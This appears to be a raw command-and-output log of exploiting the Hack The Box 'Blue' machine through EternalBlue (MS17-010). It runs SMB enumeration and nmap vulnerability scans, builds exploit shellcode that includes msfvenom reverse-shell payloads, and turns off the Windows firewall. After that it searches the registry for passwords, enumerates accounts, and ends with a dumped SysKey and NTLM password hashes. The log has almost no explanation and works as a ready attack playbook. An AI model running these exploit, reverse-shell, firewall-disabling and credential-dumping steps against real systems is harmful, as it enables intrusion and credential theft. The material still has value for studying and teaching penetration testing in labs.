Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 742.
[V] Attempting to get SIDs from blue.htb with command: rpcclient -W '' -U''%'' 'blue.htb' -c lsaenumsid 2>&1
=========================================
| Getting printer info for blue.htb |
=========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 991.
[V] Attempting to get printer info with command: rpcclient -W '' -U''%'' -c 'enumprinters' 'blue.htb' 2>&1
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
enum4linux complete on Tue Oct 10 14:18:53 2023
smbclient //blue.htb/IPC$ -U""
nmap --script=smb-brute -p 445 blue.htb -v
nmap --script=smb-vuln* -p 445 blue.htb -v
Starting Nmap 7.92 ( https://nmap.org ) at 2023-10-10 14:30 EDT
NSE: Loaded 11 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:30
Completed NSE at 14:30, 0.00s elapsed
Initiating Ping Scan at 14:30
Scanning blue.htb (10.129.123.117) [2 ports]
Completed Ping Scan at 14:30, 0.06s elapsed (1 total hosts)
Initiating Connect Scan at 14:30
Scanning blue.htb (10.129.123.117) [1 port]
Discovered open port 445/tcp on 10.129.123.117
Completed Connect Scan at 14:30, 0.05s elapsed (1 total ports)
NSE: Script scanning 10.129.123.117.
Initiating NSE at 14:30
Completed NSE at 14:30, 12.85s elapsed
Nmap scan report for blue.htb (10.129.123.117)
Host is up (0.056s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
NSE: Script Post-scanning.
Initiating NSE at 14:30
Completed NSE at 14:30, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 13.17 seconds
ls -l
total 184
-rw-r--r-- 1 root root 26444 Oct 10 16:02 eternalblue_exploit10.py
-rw-r--r-- 1 root root 25741 Oct 10 16:02 eternalblue_exploit7.py
-rw-r--r-- 1 root root 24106 Oct 10 16:02 eternalblue_exploit8.py
-rw-r--r-- 1 root root 2801 Oct 10 16:02 eternal_checker.py
-rw-r--r-- 1 root root 1070 Oct 10 16:02 LICENSE
-rwxr-xr-x 1 root root 3853 Oct 10 16:02 listener_prep.sh
-rw-r--r-- 1 root root 25943 Oct 10 16:02 mysmb.py
-rw-r--r-- 1 root root 5352 Oct 10 16:02 README.md
-rw-r--r-- 1 root root 8 Oct 10 16:02 requirements.txt
drwxr-xr-x 1 root root 192 Oct 10 16:02 shellcode
-rw-r--r-- 1 root root 49249 Oct 10 16:02 zzz_exploit.py
┌─[user@user-virtualbox]─[/usr/share/EternalBlue/AutoBlue-MS17-010]
└──╼ $pip install -r requirements.txt
Defaulting to user installation because normal site-packages is not writeable
Requirement already satisfied: impacket in /usr/lib/python3/dist-packages (from -r requirements.txt (line 1)) (0.9.22)
python3 eternal_checker.py blue.htb
searchsploit ms17-010
------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------- ---------------------------------
Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Met | windows/remote/43970.rb
Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit) | windows/dos/41891.rb
Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) | windows/remote/42031.py
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) | windows/remote/42315.py
Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010) | windows_x86-64/remote/42030.py
Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010) | windows_x86-64/remote/41987.py
------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
msfconsole
cd shellcode/
sudo ./shell_prep.sh
_.-;;-._
'-..-'| || |
'-..-'|_.-;;-._|
'-..-'| || |
'-..-'|_.-''-._|
Eternal Blue Windows Shellcode Compiler
Let's compile them windoos shellcodezzz
Compiling x64 kernel shellcode
Compiling x86 kernel shellcode
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
y
LHOST for reverse connection:
tun0
LPORT you want x64 to listen on:
1337
LPORT you want x86 to listen on:
1338
Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell
1
Type 0 to generate a staged payload or 1 to generate a stageless payload
0
Generating x64 cmd shell (staged)...
msfvenom -p windows/x64/shell/reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=tun0 LPORT=1337
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 511 bytes
Saved as: sc_x64_msf.bin
Generating x86 cmd shell (staged)...
msfvenom -p windows/shell/reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=tun0 LPORT=1338
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 375 bytes
Saved as: sc_x86_msf.bin
MERGING SHELLCODE WOOOO!!!
DONE
wmic nicconfig get description,IPAddress,MACaddress
netsh advfirewall firewall show rule name=all
reg query HKLM /f password /t REG_SZ /s
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC0989B-0CE6-11D1-BAAE-00C04FC2E20D}\ProgID
(Default) REG_SZ IAS.ChangePassword.1
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC0989B-0CE6-11D1-BAAE-00C04FC2E20D}\VersionIndependentProgID
(Default) REG_SZ IAS.ChangePassword
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6f45dc1e-5384-457a-bc13-2cd81b0d28ed}
(Default) REG_SZ PasswordProvider
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7A9D77BD-5403-11d2-8785-2E0420524153}
InfoTip REG_SZ Manages users and passwords for this computer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7be73787-ce71-4b33-b4c8-00d32b54bea8}
(Default) REG_SZ HomeGroup Password
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8841d728-1a76-4682-bb6f-a9ea53b4b3ba}
(Default) REG_SZ LogonPasswordReset
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\shell
(Default) REG_SZ changehomegroupsettings viewhomegrouppassword starthomegrouptroubleshooter sharewithdevices
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IAS.ChangePassword\CurVer
(Default) REG_SZ IAS.ChangePassword.1
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{06F5AD81-AC49-4557-B4A5-D7E9013329FC}
(Default) REG_SZ IHomeGroupPassword
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{3CD62D67-586F-309E-A6D8-1F4BAAC5AC28}
(Default) REG_SZ _PasswordDeriveBytes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{68FFF241-CA49-4754-A3D8-4B4127518549}
(Default) REG_SZ ISupportPasswordMode
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{6BC0989B-0CE6-11D1-BAAE-00C04FC2E20D}\ProgID
(Default) REG_SZ IAS.ChangePassword.1
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{6BC0989B-0CE6-11D1-BAAE-00C04FC2E20D}\VersionIndependentProgID
(Default) REG_SZ IAS.ChangePassword
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{6f45dc1e-5384-457a-bc13-2cd81b0d28ed}
(Default) REG_SZ PasswordProvider
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{7A9D77BD-5403-11d2-8785-2E0420524153}
InfoTip REG_SZ Manages users and passwords for this computer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{7be73787-ce71-4b33-b4c8-00d32b54bea8}
(Default) REG_SZ HomeGroup Password
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{8841d728-1a76-4682-bb6f-a9ea53b4b3ba}
(Default) REG_SZ LogonPasswordReset
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\shell
(Default) REG_SZ changehomegroupsettings viewhomegrouppassword starthomegrouptroubleshooter sharewithdevices
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{06F5AD81-AC49-4557-B4A5-D7E9013329FC}
(Default) REG_SZ IHomeGroupPassword
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3CD62D67-586F-309E-A6D8-1F4BAAC5AC28}
(Default) REG_SZ _PasswordDeriveBytes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{68FFF241-CA49-4754-A3D8-4B4127518549}
(Default) REG_SZ ISupportPasswordMode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Capabilities\Roaming\FormSuggest
FilterIn REG_SZ FormSuggest Passwords,Use FormSuggest,FormSuggest PW Ask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{6f45dc1e-5384-457a-bc13-2cd81b0d28ed}
(Default) REG_SZ PasswordProvider
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SO\AUTH\LOGON\ASK
Text REG_SZ Prompt for user name and password
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SO\AUTH\LOGON\SILENT
Text REG_SZ Automatic logon with current user name and password
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{63d2bb1d-e39a-41b8-9a3d-52dd06677588}\ChannelReferences\5
(Default) REG_SZ Microsoft-Windows-Shell-AuthUI-PasswordProvider/Diagnostic
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\XWizards\Components\{C100BED7-D33A-4A4B-BF23-BBEF4663D017}
(Default) REG_SZ WCN Password - PIN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\XWizards\Components\{C100BEEB-D33A-4A4B-BF23-BBEF4663D017}\Children\{C100BED7-D33A-4A4B-BF23-BBEF4663D017}
(Default) REG_SZ WCN Password PIN
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Capabilities\Roaming\FormSuggest
FilterIn REG_SZ FormSuggest Passwords,Use FormSuggest,FormSuggest PW Ask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{6f45dc1e-5384-457a-bc13-2cd81b0d28ed}
(Default) REG_SZ PasswordProvider
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\SO\AUTH\LOGON\ASK
Text REG_SZ Prompt for user name and password
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\SO\AUTH\LOGON\SILENT
Text REG_SZ Automatic logon with current user name and password
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\XWizards\Components\{C100BED7-D33A-4A4B-BF23-BBEF4663D017}
(Default) REG_SZ WCN Password - PIN
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\XWizards\Components\{C100BEEB-D33A-4A4B-BF23-BBEF4663D017}\Children\{C100BED7-D33A-4A4B-BF23-BBEF4663D017}
(Default) REG_SZ WCN Password PIN
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Classes\CLSID\{6BC0989B-0CE6-11D1-BAAE-00C04FC2E20D}\ProgID
(Default) REG_SZ IAS.ChangePassword.1
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Classes\CLSID\{6BC0989B-0CE6-11D1-BAAE-00C04FC2E20D}\VersionIndependentProgID
(Default) REG_SZ IAS.ChangePassword
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Classes\CLSID\{6f45dc1e-5384-457a-bc13-2cd81b0d28ed}
(Default) REG_SZ PasswordProvider
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Classes\CLSID\{7A9D77BD-5403-11d2-8785-2E0420524153}
InfoTip REG_SZ Manages users and passwords for this computer
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Classes\CLSID\{7be73787-ce71-4b33-b4c8-00d32b54bea8}
(Default) REG_SZ HomeGroup Password
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Classes\CLSID\{8841d728-1a76-4682-bb6f-a9ea53b4b3ba}
(Default) REG_SZ LogonPasswordReset
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\shell
(Default) REG_SZ changehomegroupsettings viewhomegrouppassword starthomegrouptroubleshooter sharewithdevices
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Classes\Interface\{06F5AD81-AC49-4557-B4A5-D7E9013329FC}
(Default) REG_SZ IHomeGroupPassword
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Classes\Interface\{3CD62D67-586F-309E-A6D8-1F4BAAC5AC28}
(Default) REG_SZ _PasswordDeriveBytes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Classes\Interface\{68FFF241-CA49-4754-A3D8-4B4127518549}
(Default) REG_SZ ISupportPasswordMode
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\DefaultUserConfiguration
Password REG_SZ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\EH-Tcp
Password REG_SZ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\RDP-Tcp
Password REG_SZ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\Policy\Pipeline\23
(Default) REG_SZ IAS.ChangePassword
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\Terminal Server\DefaultUserConfiguration
Password REG_SZ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\Terminal Server\WinStations\EH-Tcp
Password REG_SZ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\Terminal Server\WinStations\RDP-Tcp
Password REG_SZ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\RemoteAccess\Policy\Pipeline\23
(Default) REG_SZ IAS.ChangePassword
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\DefaultUserConfiguration
Password REG_SZ
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\EH-Tcp
Password REG_SZ
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
Password REG_SZ
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\RemoteAccess\Policy\Pipeline\23
(Default) REG_SZ IAS.ChangePassword
End of search: 103 match(es) found.
reg query HKCU /f password /t REG_SZ /s
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\A\52C64B7E
@%systemroot%\system32\psbase.dll,-301 REG_SZ Provides protected storage for sensitive data, such as passwords, to prevent access by unauthorized services, processes, or users.
End of search: 2 match(es) found.
wmic bios
wmic baseboard get manufacturer
wmic cpu list full
wmic qfe
wmic product get name, version, vendor
wmic qfe get Caption, Description, HotFixID, InstalledOn
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows"
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
netsh.exe firewall set opmode mode=disable profile=all
C:\Users\Administrator\Desktop>netsh advfirewall set allprofiles state off
netsh advfirewall set allprofiles state off
Ok.
Check users and domain
net user (for local user)
net user /domain (for a domain user)
net group "Domain Admins" /domain
net accounts
net accounts /domain
net logalgroup administrators
net localgroup administrators /dmain
net group "domain Admins" /domain
net group "Enterprise Admins" /domain
net view /localgroup
net localgroup Administrators
net localgroup /Domain
gpresult: view group policy
gupdate: update group policy
gpresult /z
Domain : HARIS-PC
SysKey : a749692f1dc76b46d7141ef778aa6bef
Local SID : S-1-5-21-319597671-3711062392-2889596693
SAMKey : a226d4d47dab3eb7a306c8b85ec359cb
RID : 000001f4 (500)
User : Administrator
Hash NTLM: cdf51b162460b7d5bc898f493751a0cc
RID : 000001f5 (501)
User : Guest
RID : 000003e8 (1000)
User : haris
Hash NTLM: 8002bc89de91f6b52d518bde69202dc6
RID : 000003e9 (1001)
User : purplebyteone
Hash NTLM: 744356dd2aeacf1d096d83eba7dbdd54